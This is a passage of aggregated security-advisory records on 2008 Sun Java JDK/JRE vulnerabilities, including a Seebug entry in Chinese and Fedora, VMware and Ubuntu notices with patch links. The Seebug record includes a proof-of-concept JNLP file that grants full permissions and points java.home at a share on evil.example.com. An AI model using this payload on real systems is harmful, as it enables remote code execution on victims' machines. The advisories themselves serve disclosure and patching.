CVE-2008-5339,CVE-2008-5340,CVE-2008-5341,CVE-2008-5342,CVE-2008-5343,CVE-2008-5344,CVE-2008-5345,CVE-2008-5346,CVE-2008-5347,CVE-2008-5348,CVE-2008-5349,CVE-2008-5350,CVE-2008-5351,CVE-2008-5352,CVE-2008-5353,CVE-2008-5354,CVE-2008-5355,CVE-2008-5356,CVE-2008-5357,CVE-2008-5358,CVE-2008-5359,CVE-2008-5360,CVE-2008-2086\r\n\r\nSolaris\u7cfb\u7edf\u7684Java\u8fd0\u884c\u65f6\u73af\u5883\uff08JRE\uff09\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u3002 \r\n\r\nSun Java\u4e2d\u7684\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3001\u6cc4\u9732\u7cfb\u7edf\u4fe1\u606f\u3001\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u3002\r\n\r\n1) JRE\u521b\u5efa\u4e86\u540d\u79f0\u4e0d\u8fc7\u968f\u673a\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u5199\u5165\u4efb\u610fJAR\u6587\u4ef6\u5e76\u6267\u884c\u6709\u9650\u7684\u64cd\u4f5c\u3002\r\n\r\n2) Java AWT\u5e93\u5728\u5904\u7406\u56fe\u5f62\u6a21\u578b\u65f6\u5b58\u5728\u9519\u8bef\uff0c\u5728ConvolveOp\u64cd\u4f5c\u4e2d\u4f7f\u7528\u7684\u7279\u5236Raster\u56fe\u5f62\u6a21\u578b\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n3) Java Web Start\u5728\u5904\u7406\u67d0\u4e9bGIF\u5934\u503c\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684splash logo\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u3002\r\n\r\n4) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n5) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n6) \u542f\u52a8Java Web Start\u5e94\u7528\u7a0b\u5e8f\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684\u5e94\u7528\u7a0b\u5e8f\u4ee5\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n7) \u4e0d\u53ef\u4fe1\u4efb\u7684Java Web Start\u5e94\u7528\u7a0b\u5e8f\u53ef\u4ee5\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\u548cJava Web Start\u7f13\u5b58\u7684\u4f4d\u7f6e\u3002\r\n\r\n8) Java Web Start\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JNLP\u6587\u4ef6\u4fee\u6539\u7cfb\u7edf\u5c5e\u6027\uff0c\u5982java.home\u3001java.ext.dirs\u548cuser.home\u3002\r\n\r\n9) Java Web Start\u548cJava Plug-in\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u52ab\u6301HTTP\u4f1a\u8bdd\u3002\r\n\r\n10) JRE applet\u7c7b\u52a0\u8f7d\u529f\u80fd\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u548c\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n11) Java Web Start BasicService\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6253\u5f00\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n12) Java Update\u673a\u5236\u6ca1\u6709\u68c0\u67e5\u4e0b\u8f7d\u7684\u66f4\u65b0\u8f6f\u4ef6\u5305\u7684\u6570\u5b57\u7b7e\u540d\uff0c\u8fd9\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u4e2d\u95f4\u4eba\u6216DNS\u4f2a\u9020\u653b\u51fb\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n13) \u5728\u5904\u7406JAR\u6587\u4ef6\u7684Main-Class\u6e05\u5355\u9879\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JAR\u6587\u4ef6\u5bfc\u81f4\u6808\u6ea2\u51fa\u3002\r\n\r\n14) \u8fd8\u539f\u5e8f\u5217\u53f7\u65e5\u5386\u5bf9\u8c61\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n15) JRE\u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684Pack200\u538b\u7f29JAR\u6587\u4ef6\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n16) UTF-8\u89e3\u7801\u5668\u63a5\u53d7\u957f\u4e8e\u6700\u77ed\u8868\u5355\u7684\u7f16\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u4f7f\u7528\u89e3\u7801\u5668\u7684\u5e94\u7528\u7a0b\u5e8f\u901a\u8fc7\u7279\u5236URI\u63a5\u53d7\u65e0\u6548\u7684\u5e8f\u5217\u548c\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u3002\r\n\r\n17) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u5217\u51fa\u7528\u6237\u4e3b\u76ee\u5f55\u7684\u5185\u5bb9\u3002\r\n\r\n18) \u5904\u7406RSA\u516c\u94a5\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6d88\u8017\u5927\u91cfCPU\u8d44\u6e90\u3002\r\n\r\n19) JRE Kerberos\u8ba4\u8bc1\u673a\u5236\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8017\u5c3d\u64cd\u4f5c\u7cfb\u7edf\u8d44\u6e90\u3002\r\n\r\n20) JAX-WS\u548cJAXB JRE\u8f6f\u4ef6\u5305\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n21) \u5904\u7406ZIP\u6587\u4ef6\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6cc4\u9732\u4e3b\u673a\u8fdb\u7a0b\u7684\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u3002\r\n\r\n22) \u4ece\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\u6240\u52a0\u8f7d\u7684\u6076\u610f\u4ee3\u7801\u53ef\u80fd\u83b7\u53d6\u5bf9\u672c\u5730\u4e3b\u673a\u7684\u7f51\u7edc\u8bbf\u95ee\u3002\r\n\r\n23) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\n\nSun JDK <= 6 Update 10\r\nSun JDK <= 5.0 Update 16\r\nSun JRE <= 6 Update 10\r\nSun JRE <= 5.0 Update 16\r\nSun SDK 1.4.2\r\nSun SDK 1.3.1\n RedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:1025-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:1025-01\uff1aCritical: java-1.5.0-sun security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-1025.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1025.html</a>\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-246387\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-246387\uff1aA Security Vulnerability in the Java Runtime Environment may Allow Code Loaded From the Local Filesystem to Access LocalHost\r\n\u94fe\u63a5\uff1a<a href=http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1 target=_blank>http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n<a href=http://java.sun.com/javase/downloads/index.jsp target=_blank>http://java.sun.com/javase/downloads/index.jsp</a>\r\n<a href=http://java.sun.com/javase/downloads/index_jdk5.jsp target=_blank>http://java.sun.com/javase/downloads/index_jdk5.jsp</a>\r\n<a href=http://java.sun.com/j2se/1.4.2/download.html target=_blank>http://java.sun.com/j2se/1.4.2/download.html</a>\r\n<a href=http://java.sun.com/j2se/1.3/download.html target=_blank>http://java.sun.com/j2se/1.3/download.html</a>", "published": "2008-12-09T00:00:00", "title": "Sun Java JDK/JRE\u5b89\u5168\u66f4\u65b0\u4fee\u590d\u591a\u4e2a\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5355", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "modified": "2008-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4532", "id": "SSV:4532", "sourceData": "\n <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">\r\n <information>\r\n <title>Trusted Application</title>\r\n <vendor>Trusted Vendor</vendor>\r\n <description>Trusted Application by Trusted Vendor</description>\r\n <homepage href="http://trusted.example.org/" />\r\n <offline-allowed />\r\n </information>\r\n <security><all-permissions /></security>\r\n <resources>\r\n <j2se version="1.5+" />\r\n \r\n <property name="java.home" value="\\\\evil.example.com\\jre" />\r\n <jar href="signed-and-trusted-jce-dependent-library.jar" />\r\n </resources>\r\n <application-desc main-class="org.example.trusted.app.StartApp" />\r\n </jnlp>\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4532"}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The OpenJDK runtime environment. ", "modified": "2008-12-07T04:27:51", "published": "2008-12-07T04:27:51", "id": "FEDORA:F07BD208DD2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: java-1.6.0-openjdk-1.6.0.0-0.20.b09.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The OpenJDK runtime environment. ", "modified": "2008-12-07T04:33:22", "published": "2008-12-07T04:33:22", "id": "FEDORA:2B4E3208DD6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-7.b12.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:48", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2009-1095", "CVE-2009-1093", "CVE-2009-1104", "CVE-2008-5346", "CVE-2008-2136", "CVE-2009-1096", "CVE-2008-5339", "CVE-2009-1099", "CVE-2009-1097", "CVE-2008-5341", "CVE-2008-0598", "CVE-2008-5340", "CVE-2009-1893", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-3525", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2009-1100", "CVE-2008-5342", "CVE-2008-5353", "CVE-2009-1098", "CVE-2009-1094", "CVE-2009-0692", "CVE-2009-1106", "CVE-2008-5350", "CVE-2009-1103", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2009-1101", "CVE-2008-4210", "CVE-2008-3275", "CVE-2009-1107", "CVE-2007-6063", "CVE-2009-1102", "CVE-2008-5351", "CVE-2008-2812", "CVE-2009-1105"], "description": "a. Service Console update for DHCP and third party library update for DHCP client. \n \nDHCP is an Internet-standard protocol by which a computer can be \nconnected to a local network, ask to be given configuration \ninformation, and receive from a server enough information to \nconfigure itself as a member of that network.\n\n \nA stack-based buffer overflow in the script_write_params method in \nISC DHCP dhclient allows remote DHCP servers to execute arbitrary \ncode via a crafted subnet-mask option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-0692 to this issue.\n\n \nAn insecure temporary file use flaw was discovered in the DHCP \ndaemon's init script (\"/etc/init.d/dhcpd\"). A local attacker could \nuse this flaw to overwrite an arbitrary file with the output of the \n\"dhcpd -t\" command via a symbolic link attack, if a system \nadministrator executed the DHCP init script with the \"configtest\", \n\"restart\", or \"reload\" option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-1893 to this issue.\n\n \nThe following table lists what action remediates the vulnerability \nin the Service Console (column 4) if a solution is available. \n\n", "edition": 4, "modified": "2010-01-06T00:00:00", "published": "2009-10-16T00:00:00", "id": "VMSA-2009-0014", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0014.html", "title": "VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "===========================================================\r\nUbuntu Security Notice USN-713-1 January 27, 2009\r\nopenjdk-6 vulnerabilities\r\nCVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350,\r\nCVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354,\r\nCVE-2008-5358, CVE-2008-5359, CVE-2008-5360\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 8.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 8.10:\r\n icedtea6-plugin 6b12-0ubuntu6.1\r\n openjdk-6-jdk 6b12-0ubuntu6.1\r\n openjdk-6-jre 6b12-0ubuntu6.1\r\n openjdk-6-jre-headless 6b12-0ubuntu6.1\r\n openjdk-6-jre-lib 6b12-0ubuntu6.1\r\n\r\nAfter a standard system upgrade you need to restart any Java applications\r\nto effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that Java did not correctly handle untrusted applets.\r\nIf a user were tricked into running a malicious applet, a remote attacker\r\ncould gain user privileges, or list directory contents. (CVE-2008-5347,\r\nCVE-2008-5350)\r\n\r\nIt was discovered that Kerberos authentication and RSA public key\r\nprocessing were not correctly handled in Java. A remote attacker\r\ncould exploit these flaws to cause a denial of service. (CVE-2008-5348,\r\nCVE-2008-5349)\r\n\r\nIt was discovered that Java accepted UTF-8 encodings that might be\r\nhandled incorrectly by certain applications. A remote attacker could\r\nbypass string filters, possible leading to other exploits. (CVE-2008-5351)\r\n\r\nOverflows were discovered in Java JAR processing. If a user or\r\nautomated system were tricked into processing a malicious JAR file,\r\na remote attacker could crash the application, leading to a denial of\r\nservice. (CVE-2008-5352, CVE-2008-5354)\r\n\r\nIt was discovered that Java calendar objects were not unserialized safely.\r\nIf a user or automated system were tricked into processing a specially\r\ncrafted calendar object, a remote attacker could execute arbitrary code\r\nwith user privileges. (CVE-2008-5353)\r\n\r\nIt was discovered that the Java image handling code could lead to memory\r\ncorruption. If a user or automated system were tricked into processing\r\na specially crafted image, a remote attacker could crash the application,\r\nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\r\n\r\nIt was discovered that temporary files created by Java had predictable\r\nnames. If a user or automated system were tricked into processing a\r\nspecially crafted JAR file, a remote attacker could overwrite sensitive\r\ninformation. (CVE-2008-5360)\r\n\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.diff.gz\r\n Size/MD5: 222090 25681e25a40ae36385d2429e8b905009\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.dsc\r\n Size/MD5: 2355 281bc682638116538e829499572e3cde\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz\r\n Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 8468244 7746db24f22ff25e7655bd9ad73b7077\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 4708568 3e9ffbcebcadc431e5c1a21b80e9a9b7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 25619670 4eb18b9cdd11778e80ce6b1ac63c2040\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 49156890 044fa2fafc22c35568c01e46f85dbf0a\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 81028 8f3c35e45a001a5bb5e7d7231656e206\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 47370572 db9493bf071aa08183a7aeef6efc71ea\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 2366078 639ac32c62c5b951a77a0a58fcf8ee70\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 9942620 ac6600eb8cddc9afd55d37a646ba3a89\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 24087518 d9b0e9f7a0f6df9392eed8c67fa77acd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 241532 404e268000d8d15e903f67eb4383146e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 71520 9af6963e6ddc977bd05a8dbbe40f1139\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 101844924 fcdcbeacbb5f2854f68efa196e6d0ab3\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 2348616 6313881219ebbee2ee650685bcb6105f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 9949838 366df23097c855e2d329dec6bf9f9d24\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 25169062 1354f7327a8df3422a442f37b357f77a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 230678 59ed425557f18fba815bcbf9b17c6d1d\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 72102 c3317b35cd38f7b4ab607bf49331e440\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 101930608 292954d99c81b528891824548c6b885e\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 2345410 fc2cd7ec4e96749e39307f756231fdc3\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 9945176 4a8fb4a2b021f7ce6729dca9b0eef67c\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 25192978 cccb11f6580b47ab30c981a0a8cea0f6\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 227450 abf58752fcf129175266e60b86857f8c\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 77056 790776ea3f41a2392e6c9666402428c0\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 35896200 55947cfd47a40e248a626adcb601b4da\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 2393068 c475228e916c602eea348b0382f51f21\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 8599254 97e338f60e55a488ef0ba06bc23cf414\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 22974726 e3bf13b8599a94a0b89f2757a90800f5\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 255456 54b666eaaf464931a56406d09cfff088\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 70100 b4addb80ceb8e01dd8819a1bc3b8c89a\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 103684964 9f7150e6e1675831b723cdbae5b5c963\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 2355110 38f63636383fcb60ba60552ca4e0c60c\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 9927636 7c32c7c800f01a2dc1ae878eceade91d\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 25175260 a09637fa2629b9ffa58d932078a44d67\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 232954 17e8a53c99ea3ac34c0018b2e60a2be8\r\n", "edition": 1, "modified": "2009-01-31T00:00:00", "published": "2009-01-31T00:00:00", "id": "SECURITYVULNS:DOC:21257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21257", "title": "[USN-713-1] openjdk-6 vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "JNLP may overwrite system properties java.home\r\njava.ext.dirs\r\nuser.home\r\nHeap overflow and integer overflow on TrueType fonts parsing, memory corruption on GIF parsing, integer overflow on Pack200 decompression. Multiple sendbox protection bypass vulnerabilities.", "edition": 1, "modified": "2009-04-23T00:00:00", "published": "2009-04-23T00:00:00", "id": "SECURITYVULNS:VULN:9483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9483", "title": "Sun Java JRE / JDK / Web Start multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "It was discovered that Java did not correctly handle untrusted applets. \nIf a user were tricked into running a malicious applet, a remote attacker \ncould gain user privileges, or list directory contents. (CVE-2008-5347, \nCVE-2008-5350)\n\nIt was discovered that Kerberos authentication and RSA public key \nprocessing were not correctly handled in Java. A remote attacker \ncould exploit these flaws to cause a denial of service. (CVE-2008-5348, \nCVE-2008-5349)\n\nIt was discovered that Java accepted UTF-8 encodings that might be \nhandled incorrectly by certain applications. A remote attacker could \nbypass string filters, possible leading to other exploits. (CVE-2008-5351)\n\nOverflows were discovered in Java JAR processing. If a user or \nautomated system were tricked into processing a malicious JAR file, \na remote attacker could crash the application, leading to a denial of \nservice. (CVE-2008-5352, CVE-2008-5354)\n\nIt was discovered that Java calendar objects were not unserialized safely. \nIf a user or automated system were tricked into processing a specially \ncrafted calendar object, a remote attacker could execute arbitrary code \nwith user privileges. (CVE-2008-5353)\n\nIt was discovered that the Java image handling code could lead to memory \ncorruption. If a user or automated system were tricked into processing \na specially crafted image, a remote attacker could crash the application, \nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\n\nIt was discovered that temporary files created by Java had predictable \nnames. If a user or automated system were tricked into processing a \nspecially crafted JAR file, a remote attacker could overwrite sensitive \ninformation. (CVE-2008-5360)", "edition": 5, "modified": "2009-01-27T00:00:00", "published": "2009-01-27T00:00:00", "id": "USN-713-1", "href": "https://ubuntu.com/security/notices/USN-713-1", "title": "openjdk-6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": 